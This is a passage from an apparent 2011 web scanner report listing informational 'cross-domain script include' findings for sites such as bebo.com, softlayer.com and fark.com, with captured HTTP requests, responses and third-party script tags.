Host:   http://www.beautyoftheweb.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.beautyoftheweb.com
Proxy-Connection: keep-alive
Referer: http://www.beautyoftheweb.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=mswindowsbow%3D%2526pid%253Dbow%25253A%252520highlights/sites-amaze%2526pidt%253D1%2526oid%253Dhttp%25253A//www.beautyoftheweb.com/downloadie9%2526ot%253DA
If-Modified-Since: Wed, 06 Jul 2011 15:36:55 GMT

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=292
Content-Type: text/html; charset=utf-8
Expires: Wed, 06 Jul 2011 15:45:55 GMT
Last-Modified: Wed, 06 Jul 2011 15:40:55 GMT
Vary: *
Server: Microsoft-IIS/7.0
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 15:41:03 GMT
Content-Length: 13816


<!DOCTYPE html>
<html lang="en" xmlns:fb="http://www.facebook.com/2008/fbml">
<head>
<meta charset="utf-8" />
   <title>Download Internet Explorer 9 - Beauty of the Web</title>
<meta http
...[SNIP]...
</script>
<script src="http://ajax.microsoft.com/ajax/jquery/jquery-1.4.2.min.js" type="text/javascript"></script>
...[SNIP]...
</footer>


<script type="text/javascript" src="http://static.meteorsolutions.com/metsol.js"></script>
<script type="text/javascript" src="http://ecn.dev.virtualearth.net/mapcontrol/mapcontrol.ashx?v=7.0&mkt=en-gb"></script>
...[SNIP]...
</script>
<script src="http://platform.twitter.com/widgets.js" type="text/javascript"></script>
...[SNIP]...
14.14. http://www.bebo.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.bebo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Content-Length: 26956
Date: Wed, 06 Jul 2011 11:21:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script language="javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
<script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
14.15. http://www.bebo.com/Chart.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /Chart.jsp

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /Chart.jsp HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 15645
Date: Wed, 06 Jul 2011 14:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta n
...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script><script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
14.16. http://www.bebo.com/SwitchLanguage.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /SwitchLanguage.jsp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /SwitchLanguage.jsp HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Vary: Accept-Encoding
Cache-Control: no-cache
Pragma: No-cache
Content-Language: en-US
Content-Type: text/html; charset=utf-8
Content-Length: 4640
Date: Wed, 06 Jul 2011 14:07:32 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml">null</div></div><div c
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
14.17. http://www.bebo.com/c/invite/join  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/invite/join

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/invite/join HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 22983
Date: Wed, 06 Jul 2011 14:07:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</script>
<script language="javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<div id="adcopy-captcha">
       <script type="text/javascript"
       src="http://api.solvemedia.com/papi/challenge.script?k=L9oIXIWrUZosdnonwORaAY-QZ-w5sMIv">
       </script>
...[SNIP]...
</script><script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
14.18. http://www.bebo.com/c/photos/view  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/photos/view

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/photos/view HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 14927
Date: Wed, 06 Jul 2011 14:07:30 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script>
<script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
14.19. http://www.bebo.com/c/search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bebo.com
Path:   /c/search

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /c/search HTTP/1.1
Host: www.bebo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Cache-Control: no-cache
Pragma: No-cache
Content-Language: us-US
Content-Type: text/html; charset=UTF-8
Content-Length: 16680
Date: Wed, 06 Jul 2011 14:07:31 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
</div>
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
</script><script language="javascript" src="http://api.recaptcha.net/js/recaptcha_ajax.js"></script>
...[SNIP]...
</script>
<script language="javascript" src="http://api.viximo.com/javascripts/api/viximo.js"></script>
...[SNIP]...
</script>
<script src="http://bebo.crwdcntrl.net/cc.js" type="text/javascript"></script>
...[SNIP]...
14.20. http://www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cadence.com
Path:   /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-world-web-site.aspx?CMP=home HTTP/1.1
Host: www.cadence.com
Proxy-Connection: keep-alive
Referer: http://www.cadence.com/us/pages/default.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=cadencemossprod%3D%2526pid%253Dus%25253Apages%25253Adefault.aspx%2526pidt%253D1%2526oid%253Dhttp%25253A//www.cadence.com/Community/blogs/fv/archive/2011/07/06/celebrating-the-success-of-the-uvm-worl%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 140289
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
CommunityServer: 3.1.20917.1142
X-Pingback: http://www.cadence.com/Community/blogs/fv/pingback.aspx
Set-Cookie: CommunityServer-UserCookie2101=lv=Fri, 01 Jan 1999 00:00:00 GMT&mra=Wed, 06 Jul 2011 17:00:57 GMT; expires=Fri, 06-Jul-2012 00:00:57 GMT; path=/
Set-Cookie: CSAnonymous=0cf4fa54-a507-48c0-b09a-3c779c8443a8; expires=Thu, 07-Jul-2011 01:00:57 GMT; path=/
Date: Thu, 07 Jul 2011 00:00:57 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
</script>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...
14.21. http://www.facebook.com/2008/fbml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /2008/fbml

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /2008/fbml HTTP/1.1
Host: www.facebook.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
X-XSS-Protection: 0
Set-Cookie: reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2F2008%2Ffbml; path=/; domain=.facebook.com
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.213.63
Connection: close
Date: Wed, 06 Jul 2011 11:21:54 GMT
Content-Length: 11639

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class="
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://b.static.ak.fbcdn.net/rsrc.php/v1/yH/r/OxE2LmxCQTF.css" />

<script type="text/javascript" src="http://b.static.ak.fbcdn.net/rsrc.php/v1/yJ/r/P7734y4-nbQ.js"></script>
...[SNIP]...
14.22. http://www.fark.com/cgi/farkit.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fark.com
Path:   /cgi/farkit.pl

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /cgi/farkit.pl HTTP/1.1
Host: www.fark.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:07:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Server: Apache
P3P: CP="CAO PSA OUR"
Set-Cookie: FarkUser=v7aH50e9gtrYYySpXPTIo-nBHGZ9nVB94SwKRg1VwhFj-9-YQL5BzG0ppgaq3-8tel444UtsZSFScvB7a-XxADQaRnWCK; Domain=.fark.com; Expires=Sat, 30-Jun-2012 14:07:35 GMT; Max-Age=31104000; Path=/; Version=1; HttpOnly
Expires: Wed, 06 Jul 2011 14:07:35 GMT
Vary: Accept-Encoding,User-Agent
Cache-Control: no-cache, must-revalidate
Content-Length: 36547

<!doctype html>
<!-- paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/ -->
<!--[if lt IE 7 ]> <html class="no-js ie6" lang="en"> <![endif]-->
<!--[if IE 7 ]> <html class="no-j
...[SNIP]...
<![endif]--> <script type="text/javascript" src="http://partner.googleadservices.com/gampad/google_service.js">
</script>
...[SNIP]...
</script> <script type='text/javascript' src='http://static.fmpub.net/site/fark'></script>
...[SNIP]...
<!-- Start Quantcast tag (tt) --> <script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...
14.23. http://www.microsofthardwareblog.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.microsofthardwareblog.com
Path:   /

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET / HTTP/1.1
Host: www.microsofthardwareblog.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.5
X-Powered-By: PHP/5.3.1
X-Pingback: http://microsofthardwareblog.com/xmlrpc.php
X-Powered-By: ASP.NET
Date: Wed, 06 Jul 2011 14:03:36 GMT
Connection: close
Content-Length: 67533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US" xmlns:fb="ht
...[SNIP]...
</script><script type="text/javascript" src="http://js.microsoft.com/library/mnp/2/wt/js/wt.js"></script>
...[SNIP]...
</link>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
14.24. http://www.opensource.org/licenses/gpl-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/gpl-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/gpl-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 14:05:58 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=hgig1lfiopk95ql3u4pi3mr831; expires=Fri, 29-Jul-2011 17:39:18 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 14:02:03 GMT
ETag: "1a6140a90b059f012afb34dbb1337aac"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Content-Length: 7275
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
14.25. http://www.opensource.org/licenses/mit-license.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.opensource.org
Path:   /licenses/mit-license.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /licenses/mit-license.php HTTP/1.1
Host: www.opensource.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:12 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.19 OpenSSL/0.9.8n DAV/2 SVN/1.6.17
Set-Cookie: SESScfc6ae0fd5872e4ca9e7dfd6aa7abb6f=nckibgvdkif5pk4ruq9eiask34; expires=Fri, 29-Jul-2011 15:10:32 GMT; path=/; domain=.opensource.org
Last-Modified: Wed, 06 Jul 2011 11:32:17 GMT
ETag: "88cb710a049c0b384cfdb46952931378"
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Cache-Control: must-revalidate
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 24287

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>
<
...[SNIP]...
<div class="content"><script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
14.26. http://www.ravenwoodfair.com/viximo.xd_proxy.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ravenwoodfair.com
Path:   /viximo.xd_proxy.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /viximo.xd_proxy.html HTTP/1.1
Host: www.ravenwoodfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: PasteWSGIServer/0.5 Python/2.6.4
Date: Wed, 06 Jul 2011 14:06:04 GMT
p3p: CP="CAO PSA OUR"
content-type: text/html; charset=utf-8
pragma: no-cache
cache-control: no-cache
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<body>
<!-- Link to the Viximo platform file -->
<script src="http://api.viximo.com/javascripts/api/viximo.xd.js" type="text/javascript"></script>
...[SNIP]...
14.27. http://www.softlayer.com/about/analyst-relations/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/analyst-relations/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/analyst-relations/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 22617

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/about/analyst-relations/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.28. http://www.softlayer.com/about/careers/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/careers/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/careers/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:17 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:17 GMT
Connection: close
Content-Type: text/html
Content-Length: 21288

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/about/careers/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.29. http://www.softlayer.com/about/contact-us/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/contact-us/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/contact-us/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:16 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:16 GMT
Connection: close
Content-Type: text/html
Content-Length: 26084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/about/contact-us/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.30. http://www.softlayer.com/about/feedback  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /about/feedback

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /about/feedback HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:18 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:18 GMT
Connection: close
Content-Type: text/html
Content-Length: 21557

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com//about/feedback/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.31. http://www.softlayer.com/cloudlayer/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /cloudlayer/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /cloudlayer/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:25 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:25 GMT
Connection: close
Content-Type: text/html
Content-Length: 23260

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/cloudlayer/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.32. http://www.softlayer.com/dedicated/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /dedicated/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /dedicated/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:23 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:23 GMT
Connection: close
Content-Type: text/html
Content-Length: 104124

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/dedicated/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.33. http://www.softlayer.com/index.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /index.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /index.html HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:22 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:22 GMT
Connection: close
Content-Type: text/html
Content-Length: 29867

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.34. http://www.softlayer.com/legal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /legal/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /legal/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:20 GMT
Server: Apache
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Wed, 06 Jul 2011 11:37:20 GMT
Connection: close
Content-Type: text/html
Content-Length: 21961

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML+RDFa 1.0//EN" "http://www.w3.org/MarkUp/DTD/xhtml-rdfa-1.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" xmlns:foaf="http://xmlns.com/foaf/0.1/" xmlns:dc="http
...[SNIP]...
<link
rel="canonical" href="http://www.softlayer.com/legal/" /> <script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
14.35. http://www.softlayer.com/partners/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.softlayer.com
Path:   /partners/

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /partners/ HTTP/1.1
Host: www.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:37:27 GMT
Server: Apache
